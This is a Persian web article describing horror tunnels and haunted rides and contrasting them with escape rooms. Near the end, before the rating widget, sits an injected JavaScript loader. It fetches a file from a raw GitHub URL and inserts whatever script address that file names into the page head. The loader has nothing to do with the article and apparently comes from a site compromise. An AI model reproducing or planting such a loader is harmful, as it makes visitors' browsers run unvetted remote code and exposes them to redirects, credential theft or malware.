تونل وحشت

 • با ورود به تونل وحشت یک ماجراجویی هیجان انگیز است که با حظور موجودات تر سناک والبته رعب انگیز بودن مکان میتواند نهایت ترس و هیجان را به افراد الغا کند.

  با وجود این که تونل وحشت قدمت زیادی ندارد ولی توانسته میان کسانی که تشنه هیجان هستند محبویت بالای کسب کند. می توانیم بگوییم این تجربه ای فراموش نشدنی قابلیت این را دارد که شور وهیجان فیلم های ترسناک هالیودی را برای لحظاتی هر چند کوتاه در رگ های شما تزریق کند.

  می شود از یک زاویه دیگر هم به این قضیه نگاه کرد؛ زاویه که بعد سرگرمی زیاد به چشم نیاید. می توان به چنبه مثب این اتاق ها و تونل ها نگاه کرد که به افراد کمک میکند بر ترس خود قلبه کنند. قطار وحشت شرایتی را فراهم می کند که عمیق ترین ترس ها وجودات هستند که در روبه روری شما هسنتد اگر شما هم ترس و هیجان را دوست دارید این قطار ها رو امتحان کنید.

  تونل وحشت، قطار وحشت، اتاق وحشت و سافاری وحشت نام های دیگر همه گی به فرم های مشترک بر می گردد. محیطی برای ترساندن افراد طراحی شده. قطار های وحشت میتوانند تم های مانند زامبی، ارواح ، قاتل و موجو دات شیطانی داشته باشد. در اتاق های وحشت افراد در یک میحط ترسناک قرار دارند. از مسیر های پر فراز نشیب عبور می کنند و در نهایت با موجودات رو به رو می شوند. باید در حین عبور از موانع تونل وحشت ، مراقبل هم بود. ممکن است فرد مورد حمله شیطان و موجودات پلید دیگر قرار گیرد و یا راه فرار را گم کند در یک هزار توی دیگر قرار گیرد و راه فرار برای شخص دشوار تر شود.

  آیا اتاق وحشت همان اتاق فرار است؟

  اولین چیزی که باید با این سوال باید بیان کرد اتاق یا تونل وحشت و اتاق فرار کاملا تو تجربه متفاوت است. به این صورت است که افراد در تول وحشت باید از یک مسیری رد شوند که ترس و جیجان را برایشان به ارمغان می آورد، انگار که در یک فیلم ترسناک قرار گرفته اند و با ید تا پایانش ادامه دهند. و در اتاق وحشت خبری از حل معما و تعمال با دوستان و هم تیمی ها نیست و بیشتر بک تجربه فردی محسوب می شود. در اتاق فرار (اسکیپ روم) تمرکز بر روی حل کردن یک معما است؛ معما یی که سناریوی بازی حول محور آن پیش می رود

  در اتاق فرار ژانر های اعم از ترسناک، دلهره‌آور، جنگی، اکشن، جنایی، فانتزی، درام، هیجانی، تاریخی و … داریم که هر یک هم می تونند سبک و تم های خودش رو داشته باشد اگر به زبان ساده بخواهیم بیان کنیم اتاق وحشت برای بالا بردن آدرنالین و ترساندن افراد مانور می دهد. در اتاق فرار تمرکز بر روی قدرت تفکر، حل کردن معما، تعامل با هم‌تیمی‌ها و گذشتن از چالش‌ در بستری از احساسات مختلف ازجمله هیجان و ترس است.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید